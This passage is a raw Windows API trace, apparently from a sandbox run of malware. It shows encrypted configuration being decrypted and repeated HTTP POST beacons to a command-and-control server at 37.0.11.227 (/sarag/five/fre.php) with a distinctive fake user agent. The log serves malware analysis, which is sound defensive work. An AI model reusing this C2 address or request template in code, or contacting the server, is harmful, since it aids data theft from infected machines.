(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0326.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.837] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0326.837] GetProcessHeap () returned 0x690000 [0326.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0326.837] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0326.838] GetProcessHeap () returned 0x690000 [0326.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0326.838] GetProcessHeap () returned 0x690000 [0326.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0326.839] GetProcessHeap () returned 0x690000 [0326.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0326.840] GetProcessHeap () returned 0x690000 [0326.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0326.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.841] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.845] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0326.850] GetProcessHeap () returned 0x690000 [0326.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0326.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.851] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0326.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.852] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0326.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.853] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.853] GetProcessHeap () returned 0x690000 [0326.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0326.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.854] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0326.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.857] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0326.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.858] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0326.858] GetProcessHeap () returned 0x690000 [0326.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0326.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.859] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0326.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.860] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0326.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.860] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0326.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.861] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0326.861] GetProcessHeap () returned 0x690000 [0326.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0326.861] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0326.861] GetProcessHeap () returned 0x690000 [0326.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0326.861] socket (af=2, type=1, protocol=6) returned 0xb60 [0326.862] connect (s=0xb60, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0326.889] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0326.889] GetProcessHeap () returned 0x690000 [0326.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0326.890] GetProcessHeap () returned 0x690000 [0326.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0326.890] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.892] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0326.892] GetProcessHeap () returned 0x690000 [0326.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0326.892] GetProcessHeap () returned 0x690000 [0326.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.892] GetProcessHeap () returned 0x690000 [0326.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0326.892] GetProcessHeap () returned 0x690000 [0326.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0326.893] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.894] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0326.894] GetProcessHeap () returned 0x690000 [0326.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0326.894] GetProcessHeap () returned 0x690000 [0326.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.895] send (s=0xb60, buf=0x6ad508*, len=242, flags=0) returned 242 [0326.895] send (s=0xb60, buf=0x6aba40*, len=159, flags=0) returned 159 [0326.896] GetProcessHeap () returned 0x690000 [0326.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0326.896] recv (in: s=0xb60, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0326.983] GetProcessHeap () returned 0x690000 [0326.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0326.984] GetProcessHeap () returned 0x690000 [0326.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0326.984] GetProcessHeap () returned 0x690000 [0326.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0326.984] GetProcessHeap () returned 0x690000 [0326.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0326.985] closesocket (s=0xb60) returned 0 [0326.985] GetProcessHeap () returned 0x690000 [0326.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0326.985] GetProcessHeap () returned 0x690000 [0326.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0326.985] GetProcessHeap () returned 0x690000 [0326.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0326.986] GetProcessHeap () returned 0x690000 [0326.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0326.986] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18ac) returned 0xb60 [0326.987] Sleep (dwMilliseconds=0xea60) [0326.989] GetProcessHeap () returned 0x690000 [0326.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0326.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.995] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0327.000] GetProcessHeap () returned 0x690000 [0327.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0327.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.002] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0327.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.004] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.005] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.005] GetProcessHeap () returned 0x690000 [0327.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0327.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.041] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0327.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.042] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0327.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.043] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0327.043] GetProcessHeap () returned 0x690000 [0327.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0327.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.044] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0327.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.045] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0327.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.045] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0327.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.046] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0327.046] GetProcessHeap () returned 0x690000 [0327.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0327.046] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0327.047] GetProcessHeap () returned 0x690000 [0327.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0327.048] GetProcessHeap () returned 0x690000 [0327.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0327.049] GetProcessHeap () returned 0x690000 [0327.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0327.049] GetProcessHeap () returned 0x690000 [0327.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0327.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.050] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.055] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0327.062] GetProcessHeap () returned 0x690000 [0327.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0327.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.063] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0327.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.064] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.065] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.065] GetProcessHeap () returned 0x690000 [0327.065] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0327.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.072] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0327.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.072] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0327.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.073] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0327.073] GetProcessHeap () returned 0x690000 [0327.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0327.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.074] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0327.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.075] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0327.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.076] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0327.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.077] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0327.077] GetProcessHeap () returned 0x690000 [0327.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0327.077] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0327.077] GetProcessHeap () returned 0x690000 [0327.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0327.077] socket (af=2, type=1, protocol=6) returned 0xb64 [0327.077] connect (s=0xb64, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0327.119] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0327.119] GetProcessHeap () returned 0x690000 [0327.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0327.119] GetProcessHeap () returned 0x690000 [0327.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0327.120] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0327.121] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0327.121] GetProcessHeap () returned 0x690000 [0327.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0327.121] GetProcessHeap () returned 0x690000 [0327.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0327.121] GetProcessHeap () returned 0x690000 [0327.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0327.121] GetProcessHeap () returned 0x690000 [0327.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0327.122] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0327.123] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0327.123] GetProcessHeap () returned 0x690000 [0327.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0327.123] GetProcessHeap () returned 0x690000 [0327.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0327.123] send (s=0xb64, buf=0x6ad508*, len=242, flags=0) returned 242 [0327.123] send (s=0xb64, buf=0x6aba40*, len=159, flags=0) returned 159 [0327.124] GetProcessHeap () returned 0x690000 [0327.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0327.124] recv (in: s=0xb64, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0327.193] GetProcessHeap () returned 0x690000 [0327.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0327.194] GetProcessHeap () returned 0x690000 [0327.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0327.194] GetProcessHeap () returned 0x690000 [0327.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0327.194] GetProcessHeap () returned 0x690000 [0327.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0327.194] closesocket (s=0xb64) returned 0 [0327.195] GetProcessHeap () returned 0x690000 [0327.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0327.195] GetProcessHeap () returned 0x690000 [0327.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0327.196] GetProcessHeap () returned 0x690000 [0327.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0327.196] GetProcessHeap () returned 0x690000 [0327.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0327.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18b0) returned 0xb64 [0327.198] Sleep (dwMilliseconds=0xea60) [0327.200] GetProcessHeap () returned 0x690000 [0327.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0327.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.201] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.207] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0327.213] GetProcessHeap () returned 0x690000 [0327.213] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0327.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.214] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0327.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.215] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.216] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.216] GetProcessHeap () returned 0x690000 [0327.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0327.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.218] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0327.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.219] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0327.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.220] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0327.220] GetProcessHeap () returned 0x690000 [0327.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0327.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.221] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0327.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.222] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0327.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.222] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0327.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.223] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0327.223] GetProcessHeap () returned 0x690000 [0327.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0327.223] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0327.223] GetProcessHeap () returned 0x690000 [0327.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0327.224] GetProcessHeap () returned 